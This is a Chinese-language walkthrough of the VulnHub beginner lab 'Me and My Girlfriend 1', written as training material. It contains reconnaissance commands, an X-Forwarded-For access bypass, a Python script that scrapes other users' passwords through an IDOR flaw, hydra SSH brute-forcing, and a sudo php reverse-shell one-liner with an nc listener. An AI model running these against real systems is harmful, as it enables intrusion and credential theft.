靶机描述
Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company!
Difficulty Level: Beginner
Notes: there are 2 flag files
Learning: Web Application | Simple Privilege Escalation
靶机地址
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机测试
信息收集
fscan确定靶机地址
.\fscan64.exe -h 192.168.1.0/24
start infoscan
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.105 is alive
(icmp) Target 192.168.1.103 is alive
(icmp) Target 192.168.1.1 is alive
[*] Icmp alive hosts len is: 4
192.168.1.103:80 open
192.168.1.105:139 open
192.168.1.53:22 open
192.168.1.105:135 open
192.168.1.105:443 open
192.168.1.1:80 open
192.168.1.103:22 open
192.168.1.105:3306 open
192.168.1.105:445 open
192.168.1.105:7000 open
192.168.1.105:8000 open
192.168.1.105:7680 open
确定靶机地址192.168.1.103
nmap扫描
$ nmap -sT -sV -A 192.168.1.103 -oA me
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 17:34 CST
Nmap scan report for 192.168.1.103
Host is up (0.00034s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
| 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
| 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
zsh: segmentation fault nmap -sT -sV -A 192.168.1.103 -oA me
目录扫描
gobuster dir -u http://192.168.1.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
└─$ gobuster dir -u http://192.168.1.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 139 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/08 17:37:04 Starting gobuster in directory enumeration mode
===============================================================
/misc (Status: 301) [Size: 312] [--> http://192.168.1.103/misc/]
/config (Status: 301) [Size: 314] [--> http://192.168.1.103/config/]
/server-status (Status: 403) [Size: 293]
Progress: 180146 / 220561 (81.68%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/08 17:37:24 Finished
绕过本地访问限制
访问主页发现有限制
用这个X-Forwarded-For Header插件 再增加上 127.0.0.1 即可绕过
平行越权漏洞
发现注册登录和注册页面 注册用户
点击个人信息查看源代码可以看见密码
修改id查看是否可以看到别人的密码
把id修改为1即可获取 id=1 用户的账号和密码
运行脚本保存用户
import requests
import re
def getUserInfo(id):
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36','x-forwarded-for': '127.0.0.1'}
cookie={'PHPSESSID':'7mk2k1p77qr6t1gf9ba25k6hp5'}
r = requests.get(url="http://192.168.1.103/index.php?page=profile&user_id=%s"%id,headers=headers,cookies=cookie).text
name=re.search('id="name\"\svalue="(.*?)">',r).group(1)
username=re.search('username\"\svalue="(.*?)"',r).group(1)
password=re.search('password\"\svalue="(.*?)"',r).group(1)
return name,username,password
for i in range(15):
name,username,password = getUserInfo(str(i))
if name:
print(username+":"+password)
hydra 穷举 ssh
把用户信息保存下来 再用 hydra 爆破 ssh
hydra -C userinfo ssh://192.168.1.103
登录 ssh,得到 flag1.txt
特权提升
查看当前权限
sudo -l
发现 php 不需要密码就可以执行操作
php 反弹 shell
nc -lnvp 9001
sudo php -r '$sock=fsockopen("192.168.1.53",9001);exec("/bin/bash -i <&3 >&3 2>&3");'
获取flag2.txt
后来,错过也成了人间常态